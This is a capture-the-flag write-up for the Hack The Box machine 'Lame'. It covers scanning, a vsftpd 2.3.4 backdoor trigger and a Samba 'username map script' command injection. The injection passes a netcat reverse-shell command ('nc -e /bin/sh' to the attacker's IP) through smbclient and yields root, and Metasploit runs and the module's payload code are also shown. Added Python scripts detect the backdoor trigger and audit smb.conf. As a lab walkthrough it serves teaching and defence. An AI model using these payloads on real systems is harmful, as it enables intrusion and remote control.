10.10.10.3 - Lame

Hack The Box | Created by: ch4p | Points: 20

Open ports

luc@kali:~/HTB/Lame$ nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.3
Port Service Version
21/tcp ftp vsftpd 2.3.4
22/tcp ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

FTP - vsftpd 2.3.4

luc@kali:~/HTB/Lame$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:luc): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lsa
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.

Anonymous login is allowed, but the FTP server holds no content. We do know the server runs vsftpd 2.3.4, a version that contains a backdoor.

luc@kali:~/HTB/Lame$ searchsploit vsFTPd
...
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb

I prefer a non-Metasploit exploit because of OSCP preparation, where Metasploit usage is limited. We’ll get back to this exploit in Bonus/vsftpd 2.3.4 with Metasploit.

vsftpd 2.3.4 without Metasploit

This version of vsftpd contains a backdoor that is triggered when the username sent to the server contains the string :). Triggering it opens a listener on port 6200 that gives the attacker a shell on the server.
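From the defender's side, the same two facts (the 2.3.4 banner and the :) marker in the login name) are what you would hunt for. The following is an added example, not part of the original write-up: it checks an FTP banner for the backdoored release and scans vsftpd-style log lines for login attempts whose username carries the trigger. The log lines are constructed sample data that follow vsftpd's own "[pid N] [user] OK|FAIL LOGIN" layout; the client addresses and pids are made up.

```python
import re

# Constructed vsftpd-style log lines (sample data, not taken from the Lame box).
# Layout follows vsftpd's log: <date> [pid N] [user] OK|FAIL LOGIN: Client "ip"
SAMPLE_VSFTPD_LOG = """\
Tue Jun 16 13:10:41 2020 [pid 4391] CONNECT: Client "10.10.14.16"
Tue Jun 16 13:10:45 2020 [pid 4390] [anonymous] OK LOGIN: Client "10.10.14.16", anon password "user@"
Tue Jun 16 13:11:02 2020 [pid 4402] [exploit:)] FAIL LOGIN: Client "10.10.14.16"
Tue Jun 16 13:11:30 2020 [pid 4410] [makis] OK LOGIN: Client "10.10.14.16"
Tue Jun 16 13:12:05 2020 [pid 4415] [smiley:)] FAIL LOGIN: Client "10.10.14.23"
"""

# The backdoor fires on this two-character sequence anywhere in the username;
# the login itself still fails (530), so the attempt shows up as FAIL LOGIN.
BACKDOOR_TRIGGER = ":)"
BACKDOORED_VERSION = "2.3.4"

LOGIN_RE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"'
)
BANNER_RE = re.compile(r"vsFTPd (?P<version>[\d.]+)")


def banner_version(banner):
    """Return the version string from a vsftpd 220 banner, or None if absent."""
    m = BANNER_RE.search(banner)
    return m.group("version") if m else None


def is_backdoored_banner(banner):
    """True when the banner advertises the trojaned 2.3.4 release."""
    return banner_version(banner) == BACKDOORED_VERSION


def find_trigger_attempts(log_text):
    """Return (client, username) pairs for login attempts whose name carries the trigger."""
    hits = []
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m and BACKDOOR_TRIGGER in m.group("user"):
            hits.append((m.group("client"), m.group("user")))
    return hits


if __name__ == "__main__":
    print("banner backdoored:", is_backdoored_banner("220 (vsFTPd 2.3.4)"))
    for client, user in find_trigger_attempts(SAMPLE_VSFTPD_LOG):
        print(f"backdoor trigger attempt from {client} with username {user!r}")
```

Run against a real vsftpd log the detector only needs the FAIL LOGIN lines, which vsftpd writes by default; a hit from an external address paired with a 2.3.4 banner is the signal to take the service offline or filter port 6200, which is exactly the condition the scan above stumbles into.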

First we need to trigger the backdoor:

luc@kali:~/HTB/Lame$ nc 10.10.10.3 21
220 (vsFTPd 2.3.4)
USER exploit:)
331 Please specify the password.
PASS xxx
530 Login incorrect.

We should now be able to connect to port 6200.

luc@kali:~/HTB/Lame$ nc 10.10.10.3 6200
Ncat: TIMEOUT.
luc@kali:~/HTB/Lame$ sudo nmap -p 6200 10.10.10.3
[sudo] password for luc:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 13:11 CEST
Nmap scan report for 10.10.10.3
Host is up (0.014s latency).

PORT     STATE    SERVICE
6200/tcp filtered lm-x

Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds

We get a timeout when connecting to this port, and nmap reports 6200 as filtered, not open. Either this build doesn’t contain the backdoor, or something else is blocking traffic to port 6200.

SMB

The server accepts external SMB connections. We don’t have any user accounts yet, so we try anonymous access.

luc@kali:~/HTB/Lame$ smbmap -H 10.10.10.3 -R
[+] IP: 10.10.10.3:445  Name: 10.10.10.3
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        .\tmp\*
        dr--r--r--                0 Sat Jun 13 10:18:25 2020    .
        dw--w--w--                0 Sun May 20 20:36:11 2012    ..
        dr--r--r--                0 Sat Jun 13 08:05:10 2020    .ICE-unix
        dr--r--r--                0 Sat Jun 13 08:05:35 2020    .X11-unix
        fw--w--w--               11 Sat Jun 13 08:05:35 2020    .X0-lock
        fw--w--w--                0 Sat Jun 13 08:06:17 2020    5142.jsvc_up
        .\tmp\.X11-unix\*
        dr--r--r--                0 Sat Jun 13 08:05:35 2020    .
        dr--r--r--                0 Sat Jun 13 10:18:25 2020    ..
        fr--r--r--                0 Sat Jun 13 08:05:35 2020    X0
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

We have read and write access to the tmp share, but there are no interesting files in it.

The Samba version is smbd 3.0.20-Debian; we can look for an exploit for this version.

luc@kali:~/HTB/Lame$ searchsploit Samba 3.0
...
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
...

We search for Samba 3.0 so that we also get exploits that don’t explicitly name the exact version the server runs but do apply to it. 16320 should work on this machine, but it uses Metasploit and we’re trying to avoid that tool. Metasploit will be used in Bonus/Samba exploit with Metasploit.

SMB exploit without Metasploit

The Metasploit module is quite short because the vulnerability is easy to exploit. Samba 3.0.20 through 3.0.25rc3 are vulnerable when the non-default “username map script” configuration option is in use: the username from the session setup is handed to that script through a shell, so a username containing shell metacharacters such as the backtick (`) achieves command execution.
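Because the weakness is a configuration option on a vulnerable version, the practical check on the server side is whether smb.conf sets it, and whether anonymous users can additionally write to a share (as smbmap showed for tmp). The script below is an added example, not code from the write-up or from Samba: it parses smb.conf fragments, flags “username map script” in [global] next to the static “username map” alternative, reports guest-writable shares, and offers a helper that spots the shell metacharacters a script-based mapping would pass through. Both configuration fragments are constructed; the script path in them is hypothetical.

```python
# Constructed smb.conf fragments (sample configuration, not the Lame machine's real file).
# The first enables the non-default "username map script" option that lets
# Samba 3.0.20 - 3.0.25rc3 hand the client-supplied username to a shell.
VULNERABLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = lame server
   ; hypothetical script path, for illustration only
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   guest ok = yes
   read only = no
"""

# The same file with the script-based mapping replaced by a static map file
# and the guest share made read-only.
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = lame server
   username map = /etc/samba/smbusers
[tmp]
   path = /tmp
   guest ok = yes
   read only = yes
"""

# Characters that let a username escape into shell syntax when it is
# interpolated into a command line (the backtick is what the write-up uses).
SHELL_METACHARS = set("`$;|&<>(){}\n")


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {key: value}} with lower-cased keys.

    Comment lines start with '#' or ';' (as in Samba); inline comments are not handled.
    """
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            conf[section][key.strip().lower()] = value.strip()
    return conf


def audit_smb_conf(text):
    """Return findings relevant to the username map script issue and anonymous write access."""
    conf = parse_smb_conf(text)
    findings = []
    script = conf.get("global", {}).get("username map script")
    if script:
        findings.append(
            f"global: 'username map script = {script}' passes the client-supplied username "
            "to a shell; remove it (use a static 'username map' file) and upgrade Samba"
        )
    for share, opts in conf.items():
        if share == "global":
            continue
        guest = opts.get("guest ok", "no").lower() == "yes"
        writable = (opts.get("read only", "yes").lower() == "no"
                    or opts.get("writable", "no").lower() == "yes")
        if guest and writable:
            findings.append(f"share [{share}]: anonymous users can write to it (guest ok + writable)")
    return findings


def has_shell_metachars(username):
    """True if a session-setup username contains characters a script-based map would hand to a shell."""
    return any(c in SHELL_METACHARS for c in username)


if __name__ == "__main__":
    for name, conf in (("vulnerable", VULNERABLE_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(name, "->", audit_smb_conf(conf) or ["no findings"])
    print("suspicious username:", has_shell_metachars("./=`id`"))
```

Removing the option closes the injection path on an unpatched host, but the version range quoted above is what actually matters for patching; the metacharacter check is only a triage aid for session-setup logs, since legitimate usernames never contain a backtick.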

This part of the Metasploit module will send the payload.

def exploit

    connect

    # lol?
    username = "/=`nohup " + payload.encoded + "`"
    begin
        simple.client.negotiate(false)
        simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
    rescue ::Timeout::Error, XCEPT::LoginError
        # nothing, it either worked or it didn't ;)
    end

    handler
end

The payload sits in the username field, so we can reproduce the exploit by passing a username containing our payload to smbclient when connecting to the server.

luc@kali:~/HTB/Lame$ smbclient //10.10.10.3/tmp -U './=`nohup nc -e /bin/sh 10.10.14.16 443`'
Enter =`NOHUP NC -E \bin/sh 10.10.14.16 443`'s password:
session setup failed: NT_STATUS_LOGON_FAILURE

We don’t get a session back to our netcat listener, and the prompt shows why: smbclient has rewritten nohup nc -e /bin/sh as NOHUP NC -E \bin/sh, breaking our payload.

smbclient does offer another way of logging in. We first log in anonymously to the tmp share, where anonymous access is allowed, and then use the logon command, which switches to another user account. We supply it with the username that contains our payload and an empty password.

luc@kali:~/HTB/Lame$ smbclient //10.10.10.3/tmp
Enter WORKGROUP\luc's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.16 443`"
Password:
session setup failed: NT_STATUS_IO_TIMEOUT
luc@kali:~/HTB/Lame$ sudo nc -lnvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:34076.
id
uid=0(root) gid=0(root)

The Samba service was running as root, so our reverse shell also runs as root. We can now read the user and root flags.

which python
/usr/bin/python
python -c "import pty;pty.spawn('/bin/bash')"
root@lame:/# ls /home -R
/home:
ftp  makis  service  user

/home/ftp:

/home/makis:
user.txt

/home/service:

/home/user:
root@lame:/# cat /home/makis/user.txt
69454a93************************
root@lame:/# cat /root/root.txt
92caac3b************************

TL;DR

  • A vulnerable Samba version allows RCE as root

Bonus

vsftpd 2.3.4 with Metasploit

luc@kali:~/HTB/Lame$ sudo msfdb init && msfconsole -q
[+] Starting database
[i] The database appears to be already configured, skipping initialization
-----------------------------------------------------------------------------------
The pg and/or activerecord gem version has changed, meaning deprecated pg constants
may no longer be in use, so try deleting this file to see if the
'The PGconn, PGresult, and PGError constants are deprecated...' message has gone:
/usr/share/metasploit-framework/lib/pg/deprecated_constants.rb
-----------------------------------------------------------------------------------

msf5 > search vsftp

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   #  Name               Disclosure Date  Rank    Check  Description
   -  ----               ---------------  ----    -----  -----------
   0  cmd/unix/interact                   manual  No     Unix Command, Interact with Established Connection

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

This matches our earlier finding that manually triggering this backdoor didn’t work.

Why vsftpd 2.3.4 backdoor didn’t work

We have root access after exploiting the Samba vulnerability, so we can check on the machine itself what happens when the backdoor is triggered.

First we switch from root to the makis user account; we know makis is a user because it has a directory in /home (we found user.txt there).

id
uid=0(root) gid=0(root)
python -c "import pty;pty.spawn('/bin/bash')"
root@lame:/# su - makis -c bash
makis@lame:~$

We can try connecting to 127.0.0.1 on port 6200 as the makis user.

makis@lame:~$ nc 127.0.0.1 6200
(UNKNOWN) [127.0.0.1] 6200 (?) : Connection refused

The connection is refused because some time has passed since we triggered the backdoor, so the port has closed again.

luc@kali:~/HTB/Lame$ nc 10.10.10.3 21
220 (vsFTPd 2.3.4)
USER exploit:)
331 Please specify the password.
PASS xxx
530 Login incorrect.

After triggering the backdoor again we can retry connecting to 127.0.0.1:6200.

makis@lame:~$ nc 127.0.0.1 6200
id
uid=0(root) gid=0(root)

The backdoor works when reached from localhost, which is consistent with nmap reporting port 6200 as filtered: traffic to that port from our attack box is being blocked, rather than the backdoor being absent. This could have been a path to root if Samba hadn’t already given us root.

SMB exploit with Metasploit

luc@kali:~/HTB/Lame$ sudo msfdb init && msfconsole -q
[i] Database already started
[i] The database appears to be already configured, skipping initialization
-----------------------------------------------------------------------------------
The pg and/or activerecord gem version has changed, meaning deprecated pg constants
may no longer be in use, so try deleting this file to see if the
'The PGconn, PGresult, and PGError constants are deprecated...' message has gone:
/usr/share/metasploit-framework/lib/pg/deprecated_constants.rb
-----------------------------------------------------------------------------------

msf5 > search usermap

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show payloads
...
18  cmd/unix/reverse manual No Unix Command Shell, Double Reverse TCP (telnet)
...
msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > set LHOST tun0
LHOST => 10.10.14.16
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.14.16:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oYJsXKQe85rE2iV4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "oYJsXKQe85rE2iV4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.16:4444 -> 10.10.10.3:54926) at 2020-06-16 14:45:10 +0200

id
uid=0(root) gid=0(root)